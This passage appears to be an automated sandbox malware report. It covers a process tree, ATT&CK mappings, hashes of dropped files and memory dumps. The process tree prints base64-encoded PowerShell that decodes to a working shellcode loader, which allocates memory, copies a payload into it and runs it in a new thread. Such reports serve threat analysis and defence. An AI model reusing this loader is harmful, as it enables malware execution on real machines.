BxACAAOAApAHsAJAByADAAeABWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHIAMAB4AFYAIAAkAHMAdgBQAGwAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcwB2AFAAbAAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABYAEoARABNACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWABKAEQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAZQA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGYALAAwAHgAZgA3ACwAMAB4ADQAZAAsADAAeAA5AGYALAAwAHgANgBlACwAMAB4ADUAYQAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAYQAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADcAYQAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADAAMgAsADAAeABiADEALAAwAHgANwA3ACwAMAB4AGUAYwAsADAAeABlAGMALAAwAHgANABhACwAMAB4ADgAOAAsADAAeAA5ADEALAAwAHgANgA1ACwAMAB4AGEAZgAsADAAeABiADkALAAwAHgAOQAxACwAMAB4ADEAMQAsADAAeABiAGIALAAwAHgAZQBhACwAMAB4ADIAMQAsADAAeAA1ADIALAAwAHgAZQA5ACwAMAB4ADAANgAsADAAeABjADkALAAwAHgAMwA2ACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAYgBmACwAMAB4ADkAZQAsADAAeAAyAGQALAAwAHgAMQA1ACwAMAB4ADcANQAsADAAeABmADgALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAyADYALAAwAHgAMwA4ACwAMAB4ADAAMgAsADAAeAAyADQALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQA1ACwAMAB4AGYANgAsADAAeAA2ADEALAAwAHgAZQA1ACwAMAB4ADUAMgAsADAAeABlAGIALAAwAHgAOABiACwAMAB4AGIANwAsADAAeAAwAGIALAAwAHgANgA3ACwAMAB4ADMAOQAsADAAeAAyADgALAAwAHgAMwBmACwAMAB4ADMAZAAsADAAeAA4ADEALAAwAHgAYwAzACwAMAB4ADcAMwAsADAAeABkADMALAAwAHgAOAAxACwAMAB4ADMAMAAsADAAeABjADMALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeABlADYALAAwAHgANQBmACwAMAB4ADgAZAAsADAAeAA2ADIALAAwAHgAMAA4ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAMgBiACwAMAB4ADEAMgAsADAAeABkADAALAAwAHgAOAAwACwAMAB4AGUAMgAsADAAeABhADkALAAwAHgAMgAyACwAMAB4ADcAZQAsADAAeABmADUALAAwAHgANwBiACwAMAB4ADcAYgAsADAAeAA3AGYALAAwAHgANQA5ACwAMAB4ADQAMgAsADAAeABiADMALAAwAHgANwAyACwAMAB4AGEAMAAsADAAeAA4ADIALAAwAHgANwA0ACwAMAB4ADYAZAAsADAAeABkADcALAAwAHgAZgBhACwAMAB4ADgANgAsADAAeAAxADAALAAwAHgAZQBmACwAMAB4ADMAOAAsADAAeABmADQALAAwAHgAYwBlACwAMAB4ADcAYQAsADAAeABkAGIALAAwAHgANQBlACwAMAB4ADgANAAsADAAeABkAGMALAAwAHgAMAA3ACwAMAB4ADUAZQAsADAAeAA0ADkALAAwAHgAYgBhACwAMAB4AGMAYwAsADAAeAA2AGMALAAwAHgAMgA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgANwAwACwAMAB4AGIAOQAsADAAeAAxAGUALAAwAHgAYQAwACwAMAB4ADgAZAAsADAAeAAzADIALAAwAHgAYQAxACwAMAB4ADYANwAsADAAeAAwADQALAAwAHgAMAAwACwAMAB4ADgANQAsADAAeABhADMALAAwAHgANABjACwAMAB4AGQAMgAsADAAeABhADQALAAwAHgAZgAyACwAMAB4ADIAOAAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGUANQAsADAAeAA5ADIALAAwAHgANgBhACwAMAB4ADcAZgAsADAAeAA2AGQALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABmADIALAAwAHgAMgBjACwAMAB4ADUANwAsADAAeABiADMALAAwAHgAMwBlACwAMAB4AGMAZgAsADAAeABhADcALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeABiAGMALAAwAHgAOQA1ACwAMAB4ADQANAAsADAAeABlADEALAAwAHgAMgBhACwAMAB4ADkANgAsADAAeAAwAGQALAAwAHgAMgBmACwAMAB4AGEAYwAsADAAeABhAGYALAAwAHgAMQBhACwAMAB4AGQAMAAsADAAeAA2ADIALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeAAyAGYALAAwAHgAOAAzACwAMAB4ADYAOAAsADAAeAA0ADIALAAwAHgAZQBiACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAA1ADcALAAwAHgAZAAzACwAMAB4AGYAYwAsADAAeABlADMALAAwAHgAOABkACwAMAB4ADQAZQAsADAAeABmADcALAAwAHgANwAzACwAMAB4AGUAZQAsADAAeAAyADcALAAwAHgAMAA2ACwAMAB4AGEANwAsADAAeAA4ADYALAAwAHgAMwA1ACwAMAB4ADAAOQAsADAAeABiADAALAAwAHgAZgBhACwAMAB4AGIAMwAsADAAeABlAGYALAAwAHgAZQBlACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYgBmACwAMAB4ADQAZQAsADAAeAAwADMALAAwAHgANQA0ACwAMAB4ADEAMAAsADAAeAAyADYALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAA0AGYALAAwAHgANQA2ACwAMAB4ADcAMgAsADAAeABiADEALAAwAHgAZgA4ACwAMAB4AGYAYwAsADAAeAA5AGQALAAwAHgANgBjACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAMAA3ACwAMAB4ADMANQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4AGMAOAAsADAAeABlADMALAAwAHgANQA2ACwAMAB4ADAAOQAsADAAeAA0ADIALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeABjADcALAAwAHgAYQAzACwAMAB4ADYAZAAsADAAeABiADQALAAwAHgAYgBmACwAMAB4ADQAMwAsADAAeAAzADgALAAwAHgAZQA2ACwAMAB4ADYAOQAsADAAeAA1AGIALAAwAHgAOQA2ACwAMAB4ADgAZAAsADAAeAA5ADUALAAwAHgAYwA5ACwAMAB4ADEAZAAsADAAeAAwADQALAAwAHgAYwAyACwAMAB4ADYANQAsADAAeAAxAGMALAAwAHgANwAxACwAMAB4ADIANAAsADAAeAAyAGEALAAwAHgAZABmACwAMAB4ADUANAAsADAAeAAzAGYALAAwAHgAZQAzACwAMAB4ADcANQAsADAAeAAxADcALAAwAHgANQA3ACwAMAB4ADAAYwAsADAAeAA5AGEALAAwAHgAOQA3ACwAMAB4AGEANwAsADAAeAA1AGEALAAwAHgAZgAwACwAMAB4ADkANwAsADAAeABjAGYALAAwAHgAMwBhACwAMAB4AGEAMAAsADAAeABjAGIALAAwAHgAZQBhACwAMAB4ADQANAAsADAAeAA3AGQALAAwAHgANwA4ACwAMAB4AGEANwAsADAAeABkADAALAAwAHgANwBlACwAMAB4ADIAOQAsADAAeAAxADQALAAwAHgANwAyACwAMAB4ADEANwAsADAAeABkADcALAAwAHgANAAzACwAMAB4AGIANAAsADAAeABiADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeAA0ADQALAAwAHgAOAA0ACwAMAB4AGYAZQAsADAAeAA4AGUALAAwAHgAMwAyACwAMAB4AGUANAAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFoAcABZAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABaAHAAWQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBwAFkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\453qwppi\453qwppi.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1860
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB95D.tmp" "c:\Users\Admin\AppData\Local\Temp\453qwppi\CSC8F0D2A991B80401CB930D4EB8CF84996.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Temp\453qwppi\453qwppi.dll

Filesize
3KB

MD5
1a60d2fbc2dda15b4f9617bc77f6ec6f

SHA1
ab974798c774f41b87927932ccf5a007f71634ec

SHA256
474c5d52bec63225ae3c642936ecd1e02a5fb1065f58be1bad62296e1a63c34e

SHA512
5c6e2f300b2a127bb903b00da7646a62c664f6e5d4cd5a53a7d9e0380d98d9268b225d8c704b91c03e22e66d4d2081ffe589a8f38c3b596b07c93f7ee571f62e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB95D.tmp

Filesize
1KB

MD5
c929509cc49132a8798727ec7a7614d4

SHA1
e1add8583fce9cc5c778038cbbf300ea3bcc86f2

SHA256
c17651382fca8e6c1c78b6eeb2076b9d25b163449b14365a87d8e2233aea09b9

SHA512
4f6357c82af4f08887e2e53f20430b222bb49c2be15a85ff96eab20e2106b55426d377a42a6a9ace8adb03d0e3f2b3ecde0045e637f338b5147509f30d2acc3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khl0r2aw.50x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\453qwppi\453qwppi.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\453qwppi\453qwppi.cmdline

Filesize
369B

MD5
91b84c46ab3c6b2f85e2d1310cee18c1

SHA1
10c3be2c7b60da71ffd1ff0019c3f1176952f2a0

SHA256
2eb9bb0c3b2cb8e7976f3d9c621bed94785a7d424ce34cf32913d5b1af197921

SHA512
c7f7f0c7f034f8effcb1d892827f0365840a8f6f5c7d2709b792592e307985460e63400bb4a409dcf296c8e02625e433451336898b8a9aacd173ae2f75d7dbd6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\453qwppi\CSC8F0D2A991B80401CB930D4EB8CF84996.TMP

Filesize
652B

MD5
f33405e6fc87eb9af7e72cd57c0a8eb1

SHA1
4cf615c353bb232c388a30edbefb25faf4e7783d

SHA256
d41d8ca2261b352c2828d3cedd0e5c8c1a67267da68224e0826eea4f64f6aa1f

SHA512
bd3b4d956b0e969190fe452878a08afceabfe840cd2dd837dd1d9950d064c9ebcc92e4893555c864ab520497a2362dac3414773b3b2935b92c4048ea68aa10f2

Download Submit
memory/336-0-0x0000000000400000-0x0000000000476000-memory.dmp

Filesize
472KB

Download
memory/1692-8-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/1692-2-0x0000000002F10000-0x0000000002F46000-memory.dmp

Filesize
216KB

Download
memory/1692-7-0x0000000005B20000-0x0000000005B86000-memory.dmp

Filesize
408KB

Download
memory/1692-19-0x0000000006820000-0x000000000683E000-memory.dmp

Filesize
120KB

Download
memory/1692-20-0x0000000006D80000-0x0000000006DCC000-memory.dmp

Filesize
304KB

Download
memory/1692-1-0x00000000747EE000-0x00000000747EF000-memory.dmp

Filesize
4KB

Download
memory/1692-59-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/1692-58-0x00000000747EE000-0x00000000747EF000-memory.dmp

Filesize
4KB

Download
memory/1692-9-0x0000000006260000-0x00000000065B4000-memory.dmp

Filesize
3.3MB

Download
memory/1692-6-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/1692-5-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/1692-3-0x0000000005BC0000-0x00000000061E8000-memory.dmp

Filesize
6.2MB

Download
memory/1692-4-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/1772-33-0x0000000005F60000-0x0000000005F7A000-memory.dmp

Filesize
104KB

Download
memory/1772-32-0x0000000007380000-0x00000000079FA000-memory.dmp

Filesize
6.5MB

Download
memory/1772-22-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/1772-60-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/1772-21-0x00000000747E0000-0x0000000074F90000-memory.dmp

Filesize
7.7MB

Download
memory/2408-55-0x0000000006390000-0x0000000006398000-memory.dmp

Filesize
32KB

Download
memory/2408-57-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads